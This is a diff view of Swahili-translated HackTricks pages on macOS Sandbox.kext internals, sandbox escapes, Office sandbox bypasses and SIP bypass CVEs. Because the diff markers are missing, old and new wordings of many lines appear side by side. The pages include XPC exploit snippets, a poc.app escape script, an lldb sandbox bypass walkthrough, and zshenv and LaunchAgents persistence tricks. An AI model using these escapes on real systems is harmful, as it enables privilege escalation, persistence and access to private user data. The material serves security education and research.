- **rootless_whitelist_push (#31)**: (macOS) Tumia faili ya orodha ya Ulinzi wa Uadilifu wa Mfumo (SIP).
- **rootless_whitelist_check (preflight) (#32)**: Kagua faili ya orodha ya SIP kabla ya utekelezaji.
- **rootless_protected_volume (#33)**: (macOS) Tumia ulinzi wa SIP kwa diski au sehemu.
- **rootless_mkdir_protected (#34)**: Tumia ulinzi wa SIP/DataVault kwa mchakato wa kuunda saraka.
- **rootless_mkdir_protected (#34)**: Tumia ulinzi wa SIP/DataVault kwa mchakato wa kuunda directory.
## Sandbox.kext
Kumbuka kwamba katika iOS, nyongeza ya kernel ina **wasifu wote waliowekwa kwa nguvu** ndani ya sehemu ya `__TEXT.__const` ili kuzuia kubadilishwa. Ifuatayo ni baadhi ya kazi za kuvutia kutoka kwa nyongeza ya kernel:
Kumbuka kwamba katika iOS, nyongeza ya kernel ina **wasifu wote waliowekwa kwa nguvu** ndani ya sehemu ya `__TEXT.__const` ili kuzuia kubadilishwa. Hapa kuna baadhi ya kazi za kuvutia kutoka kwa nyongeza ya kernel:
- **`hook_policy_init`**: Inachanganya `mpo_policy_init` na inaitwa baada ya `mac_policy_register`. Inatekeleza sehemu kubwa ya uanzishaji wa Sandbox. Pia inaanzisha SIP.
- **`hook_policy_initbsd`**: Inatayarisha interface ya sysctl ikijiandikisha `security.mac.sandbox.sentinel`, `security.mac.sandbox.audio_active` na `security.mac.sandbox.debug_mode` (ikiwa imebood kwa `PE_i_can_has_debugger`).
- **`hook_policy_syscall`**: Inaitwa na `mac_syscall` ikiwa na "Sandbox" kama hoja ya kwanza na msimbo unaoashiria operesheni katika ya pili. Switch inatumika kupata msimbo wa kuendesha kulingana na msimbo uliotakiwa.
- **`hook_policy_initbsd`**: Inatayarisha interface ya sysctl ikijiandikisha `security.mac.sandbox.sentinel`, `security.mac.sandbox.audio_active` na `security.mac.sandbox.debug_mode` (ikiwa imeboreshwa na `PE_i_can_has_debugger`).
- **`hook_policy_syscall`**: Inaitwa na `mac_syscall` ikiwa na "Sandbox" kama hoja ya kwanza na nambari ikionyesha operesheni katika ya pili. Switch inatumika kupata nambari ya kuendesha kulingana na nambari iliyohitajika.
### MACF Hooks
**`Sandbox.kext`** inatumia zaidi ya mia moja ya hooks kupitia MACF. Mengi ya hooks haya yatakagua tu hali fulani za kawaida ambazo zinaruhusu kutekeleza kitendo, ikiwa sivyo, zitaita **`cred_sb_evalutate`** na **vyeo** kutoka MACF na nambari inayohusiana na **operesheni** ya kutekeleza na **buffer** kwa ajili ya matokeo.
**`Sandbox.kext`** inatumia zaidi ya mia moja ya hooks kupitia MACF. Mengi ya hooks haya yatakagua tu hali fulani za kawaida ambazo zinaruhusu kutekeleza kitendo, ikiwa sivyo, zitaita **`cred_sb_evalutate`** na **credentials** kutoka MACF na nambari inayohusiana na **operesheni** ya kutekeleza na **buffer** kwa ajili ya matokeo.
Mfano mzuri wa hiyo ni kazi **`_mpo_file_check_mmap`** ambayo inachanganya **`mmap`** na ambayo itaanza kukagua ikiwa kumbukumbu mpya itakuwa inayoandikwa (na ikiwa sivyo ruhusu utekelezaji), kisha itakagua ikiwa inatumika kwa cache ya pamoja ya dyld na ikiwa ndivyo ruhusu utekelezaji, na hatimaye itaita **`sb_evaluate_internal`** (au moja ya vifungashio vyake) ili kufanya ukaguzi zaidi wa ruhusa.
Zaidi ya hayo, kati ya hooks mia moja ambazo Sandbox inatumia, kuna 3 kwa hasa ambazo ni za kuvutia sana:
Zaidi ya hayo, kati ya mia kadhaa ya hooks ambazo Sandbox inatumia, kuna 3 kwa haswa ambazo ni za kuvutia sana:
- `mpo_proc_check_for`: Inatumia wasifu ikiwa inahitajika na ikiwa haikupangwa hapo awali
- `mpo_vnode_check_exec`: Inaitwa wakati mchakato unapoleta binary inayohusishwa, kisha ukaguzi wa wasifu unafanywa na pia ukaguzi unaozuia utekelezaji wa SUID/SGID.
- `mpo_cred_label_update_execve`: Hii inaitwa wakati lebo inatolewa. Hii ni ndefu zaidi kwani inaitwa wakati binary imepakiwa kikamilifu lakini haijatekelezwa bado. Itatekeleza vitendo kama kuunda kitu cha sandbox, kuunganisha muundo wa sandbox kwa vyeo vya kauth, kuondoa ufikiaji wa bandari za mach...
- `mpo_proc_check_for`: Inatumia wasifu ikiwa inahitajika na ikiwa haijatumika hapo awali
- `mpo_vnode_check_exec`: Inaitwa wakati mchakato unapoleta binary inayohusiana, kisha ukaguzi wa wasifu unafanywa na pia ukaguzi unaozuia utekelezaji wa SUID/SGID.
- `mpo_cred_label_update_execve`: Hii inaitwa wakati lebo inatolewa. Hii ni ndefu zaidi kwani inaitwa wakati binary imepakiwa kikamilifu lakini haijatekelezwa bado. Itafanya vitendo kama kuunda kitu cha sandbox, kuunganisha muundo wa sandbox kwa credentials za kauth, kuondoa ufikiaji kwa bandari za mach...
Kumbuka kwamba **`_cred_sb_evalutate`** ni kifungashio juu ya **`sb_evaluate_internal`** na kazi hii inapata vyeo vilivyopitishwa na kisha inafanya tathmini kwa kutumia kazi ya **`eval`** ambayo kawaida inakagua **wasifu wa jukwaa** ambao kwa default unatumika kwa mchakato wote na kisha **wasifu maalum wa mchakato**. Kumbuka kwamba wasifu wa jukwaa ni moja ya sehemu kuu za **SIP** katika macOS.
Kumbuka kwamba **`_cred_sb_evalutate`** ni kifungashio juu ya **`sb_evaluate_internal`** na kazi hii inapata credentials zilizopitishwa na kisha inafanya tathmini kwa kutumia kazi ya **`eval`** ambayo kawaida inakagua **wasifu wa jukwaa** ambao kwa default unatumika kwa mchakato wote na kisha **wasifu maalum wa mchakato**. Kumbuka kwamba wasifu wa jukwaa ni moja ya sehemu kuu za **SIP** katika macOS.
## Sandboxd

26
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
View File

@ -6,7 +6,7 @@
<figure><img src="../../../../../images/image (901).png" alt=""><figcaption><p>Picha kutoka <a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
Katika picha iliyopita inawezekana kuona **jinsi sandbox itakavyopakiwa** wakati programu yenye haki **`com.apple.security.app-sandbox`** inapoendeshwa.
Katika picha iliyopita inawezekana kuona **jinsi sandbox itakavyopakiwa** wakati programu yenye haki **`com.apple.security.app-sandbox`** inatekelezwa.
Mwandiko utaunganisha `/usr/lib/libSystem.B.dylib` na binary.
@ -22,7 +22,7 @@ Hatimaye, sandbox itakamilishwa kwa wito wa **`__sandbox_ms`** ambayo itaita **`
Hii ndiyo iliyofanywa katika [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)**.**
> [!CAUTION]
> Hivyo, kwa sasa, ikiwa unaweza tu kuunda folda yenye jina linalomalizika na **`.app`** bila sifa ya karantini, unaweza kutoroka sandbox kwa sababu macOS inachunguza tu **sifa ya karantini** katika **folda ya `.app`** na katika **kifurushi kikuu** (na tutaanika kifurushi kikuu kwa **`/bin/bash`**).
> Hivyo, kwa sasa, ikiwa unaweza tu kuunda folda yenye jina linalomalizika na **`.app`** bila sifa ya karantini, unaweza kutoroka sandbox kwa sababu macOS inachunguza tu **sifa ya karantini** katika **folda ya `.app`** na katika **kifurushi kikuu** (na tutafanya kifurushi kikuu kiangalie **`/bin/bash`**).
>
> Kumbuka kwamba ikiwa kifurushi cha .app tayari kimeidhinishwa kuendesha (kimekuwa na xttr ya karantini yenye bendera ya kuidhinishwa kuendesha), unaweza pia kutumia... isipokuwa sasa huwezi kuandika ndani ya **`.app`** bundles isipokuwa una baadhi ya ruhusa za TCC zenye mamlaka (ambazo huna ndani ya sandbox ya juu).
@ -41,7 +41,7 @@ Kama ilivyoelezwa katika [**hiki chapisho**](https://www.vicarius.io/vsociety/po
### Abusing Auto Start Locations
Ikiwa mchakato wa sandboxed unaweza **kuandika** mahali ambapo **baadaye programu isiyo na sandbox itakapoendesha binary**, itakuwa na uwezo wa **kutoroka kwa kuweka** hapo binary. Mfano mzuri wa aina hii ya maeneo ni `~/Library/LaunchAgents` au `/System/Library/LaunchDaemons`.
Ikiwa mchakato wa sandboxed unaweza **kuandika** mahali ambapo **baadaye programu isiyo na sandbox itakimbia binary**, itakuwa na uwezo wa **kutoroka kwa kuweka** hapo binary. Mfano mzuri wa aina hii ya maeneo ni `~/Library/LaunchAgents` au `/System/Library/LaunchDaemons`.
Kwa hili unaweza hata kuhitaji **hatua 2**: Kufanya mchakato wenye **sandbox yenye ruhusa zaidi** (`file-read*`, `file-write*`) kutekeleza msimbo wako ambao kwa kweli utaandika mahali ambapo itatekelezwa **bila sandbox**.
@ -53,7 +53,7 @@ Angalia ukurasa huu kuhusu **Auto Start locations**:
### Abusing other processes
Ikiwa kutoka kwa mchakato wa sandbox unaweza **kuathiri michakato mingine** inayofanya kazi katika sandboxes zenye vizuizi vidogo (au hakuna), utaweza kutoroka kwenye sandboxes zao:
Ikiwa kutoka kwa mchakato wa sandbox unaweza **kuathiri michakato mingine** inayokimbia katika sandboxes zenye vizuizi vidogo (au hakuna), utaweza kutoroka kwenye sandboxes zao:
{{#ref}}
../../../macos-proces-abuse/
@ -63,7 +63,7 @@ Ikiwa kutoka kwa mchakato wa sandbox unaweza **kuathiri michakato mingine** inay
Sandbox pia inaruhusu kuwasiliana na **Huduma za Mach** fulani kupitia XPC zilizofafanuliwa katika profaili `application.sb`. Ikiwa utaweza **kutumia** moja ya hizi huduma unaweza kuwa na uwezo wa **kutoroka sandbox**.
Kama ilivyoonyeshwa katika [hiki andiko](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/), taarifa kuhusu huduma za Mach inahifadhiwa katika `/System/Library/xpc/launchd.plist`. Inawezekana kupata huduma zote za System na User Mach kwa kutafuta ndani ya faili hiyo kwa `<string>System</string>` na `<string>User</string>`.
Kama ilivyoonyeshwa katika [hiki andiko](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/), taarifa kuhusu huduma za Mach zimehifadhiwa katika `/System/Library/xpc/launchd.plist`. Inawezekana kupata huduma zote za System na User Mach kwa kutafuta ndani ya faili hiyo kwa `<string>System</string>` na `<string>User</string>`.
Zaidi ya hayo, inawezekana kuangalia ikiwa huduma ya Mach inapatikana kwa programu ya sandboxed kwa kuita `bootstrap_look_up`:
```objectivec
@ -103,7 +103,7 @@ Njia nyingine ya kupata huduma halali za xpc ni kuangalia zile katika:
find /System/Library/Frameworks -name "*.xpc"
find /System/Library/PrivateFrameworks -name "*.xpc"
```
Kadhaa ya mifano inayotumia mbinu hii yanaweza kupatikana katika [**andiko la awali**](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/), hata hivyo, yafuatayo ni baadhi ya mifano iliyofupishwa.
Kadhaa ya mifano ya kutumia mbinu hii yanaweza kupatikana katika [**andiko la awali**](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/), hata hivyo, yafuatayo ni baadhi ya mifano iliyofupishwa.
#### /System/Library/PrivateFrameworks/StorageKit.framework/XPCServices/storagekitfsrunner.xpc
@ -173,7 +173,7 @@ break;
```
#### /System/Library/PrivateFrameworks/WorkflowKit.framework/XPCServices/ShortcutsFileAccessHelper.xpc
Huduma hii ya XPC inaruhusu kutoa ufikiaji wa kusoma na kuandika kwa URL yoyote kwa mteja wa XPC kupitia njia `extendAccessToURL:completion:` ambayo inakubali muunganisho wowote. Kwa kuwa huduma ya XPC ina FDA, inawezekana kutumia ruhusa hizi kukwepa TCC kabisa.
Huduma hii ya XPC inaruhusu kutoa ufikiaji wa kusoma na kuandika kwa URL yoyote kwa mteja wa XPC kupitia njia `extendAccessToURL:completion:` ambayo inakubali muunganisho wowote. Kwa kuwa huduma ya XPC ina FDA, inawezekana kutumia ruhusa hizi kuzunguka TCC kabisa.
Ushambuliaji ulikuwa:
```objectivec
@ -205,9 +205,9 @@ NSLog(@"Read the target content:%@", [NSData dataWithContentsOfURL:targetURL]);
```
### Static Compiling & Dynamically linking
[**Utafiti huu**](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/) uligundua njia 2 za kupita Sandbox. Kwa sababu sandbox inatumika kutoka userland wakati maktaba ya **libSystem** inapoloadiwa. Ikiwa binary inaweza kuepuka kuiload, haitapata sandbox kamwe:
[**Utafiti huu**](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/) uligundua njia 2 za kupita Sandbox. Kwa sababu sandbox inatumika kutoka userland wakati maktaba ya **libSystem** inapoload. Ikiwa binary inaweza kuepuka kuiload, haitapata sandboxed kamwe:
- Ikiwa binary ilikuwa **imeundwa kabisa kwa statically**, inaweza kuepuka kuiload maktaba hiyo.
- Ikiwa binary ilikuwa **imeundwa kwa njia ya statically kabisa**, inaweza kuepuka kuiload maktaba hiyo.
- Ikiwa **binary haitahitaji kuiload maktaba yoyote** (kwa sababu linker pia iko katika libSystem), haitahitaji kuiload libSystem.
### Shellcodes
@ -225,7 +225,7 @@ Kama ilivyoelezwa katika **[bonus of this writeup](https://jhftss.github.io/A-Ne
(allow default)
(deny file-write* (literal "/private/tmp/sbx"))
```
inaweza kupuuziliwa mbali na mchakato mpya ukitekeleza kwa mfano:
inaweza kupuuziliwa mbali na mchakato mpya unaotekeleza kwa mfano:
```bash
mkdir -p /tmp/poc.app/Contents/MacOS
echo '#!/bin/sh\n touch /tmp/sbx' > /tmp/poc.app/Contents/MacOS/poc
@ -324,7 +324,7 @@ Sandbox Bypassed!
```
### Debug & bypass Sandbox with lldb
Tukutane na programu ambayo inapaswa kuwekwa kwenye sandbox:
Tuchakue programu ambayo inapaswa kuwekwa kwenye sandbox:
{{#tabs}}
{{#tab name="sand.c"}}
@ -361,7 +361,7 @@ system("cat ~/Desktop/del.txt");
{{#endtab}}
{{#endtabs}}
Kisha jenga programu:
Kisha jumuisha programu:
```bash
# Compile it
gcc -Xlinker -sectcreate -Xlinker __TEXT -Xlinker __info_plist -Xlinker Info.plist sand.c -o sand
@ -456,7 +456,7 @@ Process 2517 resuming
Sandbox Bypassed!
Process 2517 exited with status = 0 (0x00000000)
```
> [!WARNING] > **Hata kama Sandbox imeepukwa TCC** itauliza mtumiaji kama anataka kuruhusu mchakato kusoma faili kutoka kwenye desktop
> [!WARNING] > **Hata kama Sandbox imepita TCC** itauliza mtumiaji kama anataka kuruhusu mchakato kusoma faili kutoka desktop
## References

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md
View File

@ -12,11 +12,11 @@ Angalia [**ripoti ya asili hapa**](https://www.mdsec.co.uk/2018/08/escaping-the-
### Word Sandbox bypass via Login Items and zip
Kumbuka kwamba kutoka kwa kutoroka kwanza, Word inaweza kuandika faili za kawaida ambazo jina lake linaanza na `~$` ingawa baada ya patch ya vuln iliyopita haikuwezekana kuandika katika `/Library/Application Scripts` au katika `/Library/LaunchAgents`.
Kumbuka kwamba kutoka kwa kutoroka kwanza, Word inaweza kuandika faili za kawaida ambazo jina lake linaanza na `~$` ingawa baada ya patch ya udhaifu wa awali haikuwezekana kuandika katika `/Library/Application Scripts` au katika `/Library/LaunchAgents`.
Iligundulika kwamba kutoka ndani ya sandbox inawezekana kuunda **Login Item** (programu ambazo zitatekelezwa wakati mtumiaji anapoingia). Hata hivyo, programu hizi **hazitaweza kutekelezwa isipokuwa** zime **notarized** na **haiwezekani kuongeza args** (hivyo huwezi tu kuendesha shell ya kinyume kwa kutumia **`bash`**).
Kutoka kwa kutoroka kwa Sandbox iliyopita, Microsoft ilizima chaguo la kuandika faili katika `~/Library/LaunchAgents`. Hata hivyo, iligundulika kwamba ikiwa utaweka **faili ya zip kama Login Item** `Archive Utility` itachambua tu **zip** katika eneo lake la sasa. Hivyo, kwa sababu kwa kawaida folda `LaunchAgents` kutoka `~/Library` haijaundwa, ilikuwa inawezekana **kuzipa plist katika `LaunchAgents/~$escape.plist`** na **kuiweka** faili ya zip katika **`~/Library`** ili wakati wa kufungua itafikia mahali pa kudumu.
Kutoka kwa kutoroka kwa Sandbox ya awali, Microsoft ilizima chaguo la kuandika faili katika `~/Library/LaunchAgents`. Hata hivyo, iligundulika kwamba ikiwa utaweka **faili ya zip kama Login Item** `Archive Utility` itachambua tu **zip** katika eneo lake la sasa. Hivyo, kwa sababu kwa kawaida folda `LaunchAgents` kutoka `~/Library` haijaundwa, ilikuwa inawezekana **kuzipa plist katika `LaunchAgents/~$escape.plist`** na **kuiweka** faili ya zip katika **`~/Library`** ili wakati wa kufungua itafikia mahali pa kudumu.
Angalia [**ripoti ya asili hapa**](https://objective-see.org/blog/blog_0x4B.html).
@ -24,7 +24,7 @@ Angalia [**ripoti ya asili hapa**](https://objective-see.org/blog/blog_0x4B.html
(Kumbuka kwamba kutoka kwa kutoroka kwanza, Word inaweza kuandika faili za kawaida ambazo jina lake linaanza na `~$`).
Hata hivyo, mbinu iliyopita ilikuwa na kikomo, ikiwa folda **`~/Library/LaunchAgents`** ipo kwa sababu programu nyingine iliiunda, ingekuwa na makosa. Hivyo, mnyororo tofauti wa Login Items uligundulika kwa hili.
Hata hivyo, mbinu ya awali ilikuwa na kikomo, ikiwa folda **`~/Library/LaunchAgents`** ipo kwa sababu programu nyingine iliiunda, ingekuwa na shida. Hivyo, mnyororo tofauti wa Login Items uligundulika kwa hili.
Mshambuliaji angeweza kuunda faili **`.bash_profile`** na **`.zshenv`** zikiwa na payload ya kutekeleza na kisha kuzipa na **kuandika zip katika** folda ya mtumiaji wa wahanga: **`~/~$escape.zip`**.
@ -36,7 +36,7 @@ Angalia [**ripoti ya asili hapa**](https://desi-jarvis.medium.com/office365-maco
Kutoka kwa michakato ya sandboxed bado inawezekana kuita michakato mingine kwa kutumia **`open`** utility. Zaidi ya hayo, michakato hii itakimbia **ndani ya sandbox yao wenyewe**.
Ilipatikana kwamba utility ya open ina chaguo la **`--env`** kuendesha programu na **mabadiliko maalum**. Hivyo, ilikuwa inawezekana kuunda **faili ya `.zshenv`** ndani ya folda **ndani** ya **sandbox** na kutumia `open` na `--env` kuweka **`HOME` variable** kwa folda hiyo ikifungua programu hiyo ya `Terminal`, ambayo itatekeleza faili ya `.zshenv` (kwa sababu fulani ilikuwa pia inahitajika kuweka variable `__OSINSTALL_ENVIROMENT`).
Iligundulika kwamba utility ya open ina chaguo la **`--env`** kuendesha programu na **mabadiliko maalum**. Hivyo, ilikuwa inawezekana kuunda **faili ya `.zshenv`** ndani ya folda **ndani** ya **sandbox** na kutumia `open` na `--env` kuweka **`HOME` variable** kwa folda hiyo ikifungua programu hiyo ya `Terminal`, ambayo itatekeleza faili ya `.zshenv` (kwa sababu fulani ilikuwa pia inahitajika kuweka variable `__OSINSTALL_ENVIROMENT`).
Angalia [**ripoti ya asili hapa**](https://perception-point.io/blog/technical-analysis-of-cve-2021-30864/).
@ -46,7 +46,7 @@ Utility ya **`open`** pia ilisaidia param ya **`--stdin`** (na baada ya kutoroka
Jambo ni kwamba hata kama **`python`** ilitiwa saini na Apple, haitatekeleza **script** yenye sifa ya **`quarantine`**. Hata hivyo, ilikuwa inawezekana kuipatia script kutoka stdin hivyo haitakagua ikiwa ilikuwa imewekwa karantini au la:&#x20;
1. Angusha faili **`~$exploit.py`** yenye amri za Python za kawaida.
1. Angusha faili ya **`~$exploit.py`** yenye amri za Python za kawaida.
2. Kimbia _open_ **`stdin='~$exploit.py' -a Python`**, ambayo inakimbia programu ya Python na faili yetu iliyotupwa ikihudumu kama ingizo lake la kawaida. Python kwa furaha inakimbia msimbo wetu, na kwa kuwa ni mchakato wa mtoto wa _launchd_, haifungwi na sheria za sandbox za Word.
{{#include ../../../../../banners/hacktricks-training.md}}

54
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
View File

@ -2,9 +2,9 @@
{{#include ../../../banners/hacktricks-training.md}}
## **Basic Information**
## **Taarifa za Msingi**
**System Integrity Protection (SIP)** katika macOS ni mekanizma iliyoundwa kuzuia hata watumiaji wenye mamlaka makubwa kufanya mabadiliko yasiyoidhinishwa kwenye folda muhimu za mfumo. Kipengele hiki kina jukumu muhimu katika kudumisha uadilifu wa mfumo kwa kuzuia vitendo kama kuongeza, kubadilisha, au kufuta faili katika maeneo yaliyolindwa. Folda kuu zinazolindwa na SIP ni pamoja na:
**Ulinzi wa Uadilifu wa Mfumo (SIP)** katika macOS ni mekanizma iliyoundwa kuzuia hata watumiaji wenye mamlaka makubwa kufanya mabadiliko yasiyoidhinishwa kwenye folda muhimu za mfumo. Kipengele hiki kina jukumu muhimu katika kudumisha uadilifu wa mfumo kwa kuzuia vitendo kama kuongeza, kubadilisha, au kufuta faili katika maeneo yaliyo na ulinzi. Folda kuu zinazolindwa na SIP ni pamoja na:
- **/System**
- **/bin**
@ -13,7 +13,7 @@
Sheria zinazosimamia tabia ya SIP zimefafanuliwa katika faili ya usanidi iliyo katika **`/System/Library/Sandbox/rootless.conf`**. Ndani ya faili hii, njia ambazo zinaanzishwa na alama ya nyota (\*) zinatambulishwa kama visamaha kwa vizuizi vya SIP ambavyo ni vikali.
Fikiria mfano hapa chini:
Fikiria mfano ulio hapa chini:
```javascript
/usr
* /usr/libexec/cups
@ -36,10 +36,10 @@ drwxr-xr-x 338 root wheel restricted 10816 May 13 00:29 /usr/libexec
```
Hapa, bendera **`restricted`** inaonyesha kwamba saraka ya `/usr/libexec` inalindwa na SIP. Katika saraka iliyo na ulinzi wa SIP, faili haziwezi kuundwa, kubadilishwa, au kufutwa.
Zaidi ya hayo, ikiwa faili ina sifa **`com.apple.rootless`** sifa ya **extended**, faili hiyo pia itakuwa **inalindwa na SIP**.
Zaidi ya hayo, ikiwa faili ina sifa **`com.apple.rootless`** sifa ya ziada, faili hiyo pia itakuwa **inalindwa na SIP**.
> [!TIP]
> Kumbuka kwamba **Sandbox** hook **`hook_vnode_check_setextattr`** inazuia jaribio lolote la kubadilisha sifa ya extended **`com.apple.rootless`.**
> Kumbuka kwamba **Sandbox** hook **`hook_vnode_check_setextattr`** inazuia jaribio lolote la kubadilisha sifa ya ziada **`com.apple.rootless`.**
**SIP pia inakadiria vitendo vingine vya root** kama:
@ -48,7 +48,7 @@ Zaidi ya hayo, ikiwa faili ina sifa **`com.apple.rootless`** sifa ya **extended*
- Kubadilisha mabadiliko ya NVRAM
- Kuruhusu ufuatiliaji wa kernel
Chaguzi zinawekwa katika mabadiliko ya nvram kama bitflag (`csr-active-config` kwenye Intel na `lp-sip0` inasomwa kutoka kwa Mti wa Kifaa kilichozinduliwa kwa ARM). Unaweza kupata bendera hizo katika msimbo wa chanzo wa XNU katika `csr.sh`:
Chaguzi zinahifadhiwa katika mabadiliko ya nvram kama bitflag (`csr-active-config` kwenye Intel na `lp-sip0` inasomwa kutoka kwa Mti wa Kifaa kilichozinduliwa kwa ARM). Unaweza kupata bendera hizo katika msimbo wa chanzo wa XNU katika `csr.sh`:
<figure><img src="../../../images/image (1192).png" alt=""><figcaption></figcaption></figure>
@ -68,9 +68,9 @@ csrutil enable --without debug
```
### Mipango Mingine
- **Inakata kupakia nyongeza zisizo na saini** (kexts), kuhakikisha kuwa nyongeza zilizothibitishwa pekee ndizo zinazoingiliana na kernel ya mfumo.
- **Inakataza kupakia nyongeza za kernel zisizo na saini** (kexts), kuhakikisha kuwa nyongeza zilizothibitishwa pekee ndizo zinazoingiliana na kernel ya mfumo.
- **Inazuia ufuatiliaji** wa michakato ya mfumo wa macOS, ikilinda sehemu za msingi za mfumo kutokana na ufikiaji na mabadiliko yasiyoidhinishwa.
- **Inakandamiza zana** kama dtrace kutoka kuangalia michakato ya mfumo, ikilinda zaidi uaminifu wa uendeshaji wa mfumo.
- **Inakandamiza zana** kama dtrace kutoka kuangalia michakato ya mfumo, ikilinda zaidi uadilifu wa uendeshaji wa mfumo.
[**Jifunze zaidi kuhusu taarifa za SIP katika mazungumzo haya**](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship)**.**
@ -92,10 +92,10 @@ csrutil enable --without debug
Kupita SIP kunamuwezesha mshambuliaji:
- **Fikia Data ya Mtumiaji**: Soma data nyeti za mtumiaji kama barua, ujumbe, na historia ya Safari kutoka kwa akaunti zote za mtumiaji.
- **Fikia Data za Mtumiaji**: Soma data nyeti za mtumiaji kama barua, ujumbe, na historia ya Safari kutoka kwa akaunti zote za mtumiaji.
- **Kupita TCC**: Manipulate moja kwa moja hifadhidata ya TCC (Transparency, Consent, and Control) ili kutoa ufikiaji usioidhinishwa kwa kamera, kipaza sauti, na rasilimali nyingine.
- **Kuweka Uthibitisho**: Weka malware katika maeneo yaliyo na ulinzi wa SIP, na kufanya iwe ngumu kuondoa, hata kwa ruhusa za mizizi. Hii pia inajumuisha uwezekano wa kuingilia kati Zana ya Kuondoa Malware (MRT).
- **Pakia Nyongeza za Kernel**: Ingawa kuna vizuizi vya ziada, kupita SIP kunarahisisha mchakato wa kupakia nyongeza zisizo na saini.
- **Pakia Nyongeza za Kernel**: Ingawa kuna vizuizi vya ziada, kupita SIP kunarahisisha mchakato wa kupakia nyongeza za kernel zisizo na saini.
### Mifuko ya Installer
@ -112,29 +112,29 @@ Moja ya mianya inayoweza kutokea ni kwamba ikiwa faili imeainishwa katika **`roo
#### [CVE-2019-8561](https://objective-see.org/blog/blog_0x42.html) <a href="#cve" id="cve"></a>
Iligundulika kuwa ilikuwa inawezekana **kubadilisha kifurushi cha installer baada ya mfumo kuthibitisha saini yake** na kisha, mfumo ungeweza kufunga kifurushi kibaya badala ya asili. Kwa kuwa vitendo hivi vilifanywa na **`system_installd`**, ingekuwa inaruhusu kupita SIP.
Iligundulika kuwa ilikuwa inawezekana **kubadilisha kifurushi cha installer baada ya mfumo kuthibitisha saini yake** na kisha, mfumo ungeweka kifurushi kibaya badala ya asili. Kwa kuwa vitendo hivi vilifanywa na **`system_installd`**, ingekuwa inaruhusu kupita SIP.
#### [CVE-20209854](https://objective-see.org/blog/blog_0x4D.html) <a href="#cve-unauthd-chain" id="cve-unauthd-chain"></a>
Ikiwa kifurushi kilifungwa kutoka kwa picha iliyowekwa au diski ya nje, **installer** ingefanya **kazi** ya binary kutoka **mfumo huo wa faili** (badala ya kutoka eneo lililokuwa na ulinzi wa SIP), na kufanya **`system_installd`** kutekeleza binary isiyo na mpangilio.
Ikiwa kifurushi kilikuwa kimewekwa kutoka kwa picha iliyowekwa au diski ya nje, **installer** ingekuwa **inasimamia** binary kutoka **safu hiyo** (badala ya eneo lililokuwa na ulinzi wa SIP), ikifanya **`system_installd`** kuendesha binary isiyo na mpangilio.
#### CVE-2021-30892 - Shrootless
[**Watafiti kutoka kwenye chapisho hili la blog**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) waligundua udhaifu katika mfumo wa Ulinzi wa Uaminifu wa Mfumo wa macOS (SIP), uliopewa jina la 'Shrootless'. Udhaifu huu unahusiana na **`system_installd`** daemon, ambayo ina ruhusa, **`com.apple.rootless.install.heritable`**, inayoruhusu mchakato wowote wa mtoto kupita vizuizi vya mfumo wa faili vya SIP.
[**Watafiti kutoka chapisho hili la blog**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) waligundua udhaifu katika mfumo wa Ulinzi wa Uadilifu wa Mfumo wa macOS (SIP), uliopewa jina la 'Shrootless'. Udhaifu huu unahusiana na **`system_installd`** daemon, ambayo ina ruhusa, **`com.apple.rootless.install.heritable`**, inayoruhusu mchakato wowote wa mtoto kupita vizuizi vya mfumo wa faili vya SIP.
**`system_installd`** daemon itafunga mifuko ambayo imesainiwa na **Apple**.
**`system_installd`** daemon itasakinisha mifuko ambayo imesainiwa na **Apple**.
Watafiti waligundua kuwa wakati wa ufungaji wa kifurushi kilichosainiwa na Apple (.pkg file), **`system_installd`** **inaendesha** yoyote **post-install** scripts zilizojumuishwa katika kifurushi. Scripts hizi zinafanywa na shell ya kawaida, **`zsh`**, ambayo moja kwa moja **inaendesha** amri kutoka kwa **`/etc/zshenv`** faili, ikiwa ipo, hata katika hali isiyo ya mwingiliano. Tabia hii inaweza kutumiwa na washambuliaji: kwa kuunda faili mbaya ya `/etc/zshenv` na kusubiri **`system_installd` itumie `zsh`**, wanaweza kufanya operesheni zisizo na mpangilio kwenye kifaa.
Watafiti waligundua kuwa wakati wa usakinishaji wa kifurushi kilichosainiwa na Apple (.pkg file), **`system_installd`** **inasimamia** yoyote **post-install** scripts zilizojumuishwa katika kifurushi. Scripts hizi zinaendeshwa na shell ya kawaida, **`zsh`**, ambayo moja kwa moja **inasimamia** amri kutoka kwa **`/etc/zshenv`** faili, ikiwa ipo, hata katika hali isiyo ya mwingiliano. Tabia hii inaweza kutumiwa na washambuliaji: kwa kuunda faili mbaya ya `/etc/zshenv` na kusubiri **`system_installd` itumie `zsh`**, wangeweza kufanya operesheni zisizo na mpangilio kwenye kifaa.
Zaidi ya hayo, iligundulika kuwa **`/etc/zshenv` inaweza kutumika kama mbinu ya jumla ya shambulio**, sio tu kwa kupita SIP. Kila wasifu wa mtumiaji una faili ya `~/.zshenv`, ambayo inafanya kazi sawa na `/etc/zshenv` lakini haitahitaji ruhusa za mizizi. Faili hii inaweza kutumika kama mbinu ya uthibitisho, ikichochea kila wakati `zsh` inapoanza, au kama mbinu ya kupandisha ruhusa. Ikiwa mtumiaji wa admin anapandisha hadi mizizi kwa kutumia `sudo -s` au `sudo <command>`, faili ya `~/.zshenv` itachochewa, ikipandisha hadi mizizi.
